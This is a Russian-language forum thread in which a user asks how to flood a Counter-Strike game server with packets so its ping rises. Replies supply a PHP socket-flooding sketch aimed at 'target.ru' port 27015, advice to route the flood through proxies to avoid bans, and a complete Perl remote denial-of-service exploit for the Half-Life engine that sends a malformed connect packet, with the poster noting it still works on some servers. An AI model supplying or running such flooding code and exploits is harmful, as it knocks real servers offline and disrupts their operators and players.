CounterStrike

Discussion in 'PHP' started by vl25, 8 Dec 2008.

  1. vl25

    vl25 New Member

    Joined:
    25 Jun 2008
    Messages:
    12
    Likes Received:
    1
    Reputations:
    0
    Хай народ, не скажете как через php забросать пакетами\запросами игровой сервер так чтобы на нём значительно поднялся пинг?
     
    1 person likes this.
  2. rtw

    rtw New Member

    Joined:
    22 Nov 2008
    Messages:
    16
    Likes Received:
    4
    Reputations:
    0
    Если знать точно какие запросы будет принимать сервер и обрабатывать, то как-то так:
    PHP:
    function send_pocket()
    {
    error_reporting(E_ALL);
    $address gethostbyname('target.ru');
    $port "27015" 
    $socket socket_create(AF_INETSOCK_STREAMSOL_TCP); //Кстати, игровой траффик обычно по UDP, но не суть важно в наброске
    $res socket_connect($socket$address$port);
    socket_write($socket'HERE_REQUEST'strlen('HERE_REQUEST'));
    send_pocket()
    }
    //Вместе с поднятием пинга, такая рекурсия создаст из самого себя не более чем вантуз. Но это тольно набросок идеи!
     
  3. Swedesh

    Swedesh Banned

    Joined:
    29 Oct 2008
    Messages:
    0
    Likes Received:
    63
    Reputations:
    0
    спасибо с меня +
     
    2 people like this.
  4. inlanger

    inlanger Elder - Старейшина

    Joined:
    7 Jan 2007
    Messages:
    985
    Likes Received:
    283
    Reputations:
    27
    Если админ не дурак, то твой ip сразу забанят. Надо ещё прокси туда добавить, вот тогда весело будет :)
     
  5. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    На php? вы изврашенцы?
     
  6. Тигр

    Тигр Member

    Joined:
    24 Aug 2007
    Messages:
    3
    Likes Received:
    12
    Reputations:
    0
    Старенький но кое где работает еще.
    Code:
    #!/usr/bin/perl
    # Server must not be running steam. /str0ke
    
    
    # Half-Life engine remote DoS exploit
    # bug found by Firestorm
    # tested against cstrike 1.6 Windows build-in server, cstrike 1.6 linux dedicated server
    use IO::Socket;
    die "usage: ./csdos <host>" unless $ARGV[0];
    $host=$ARGV[0];
    
    if (fork())
    { econnect($host); }
    else
    { econnect($host); };
    exit;
    
    sub econnect($)
    {
    my $host=$_[0];
    my $sock = new
    IO::Socket::INET(PeerAddr=>$host,PeerPort=>'27015',Proto=>'udp');
    die "Could not create socket: $!\n" unless $sock;
    $cmd="\xff\xff\xff\xff";
    syswrite $sock, $cmd."getchallenge";
    
    sysread $sock,$b,65535; print $b,"\n";
    @c=split(/ /,$b);
    
    $c2=$c[1];
    
    $q=$cmd."connect 47 $c2 \"\\prot\\4\\unique\\0\\raw\\valve\\cdkey\\f0ef8a362 58af1bb64ed866538c9db76\"\"\\\"\0\0";
    print '>',$q,"\n";
    syswrite $sock, $q;
    sysread $sock,$b,65535; print $b,"\n";
    sleep 3;
    close $sock;
    }
     
  7. banned

    banned Banned

    Joined:
    20 Nov 2006
    Messages:
    3,324
    Likes Received:
    1,193
    Reputations:
    252
    # bug found by Firestorm
    Это или то что я думаю или не думаю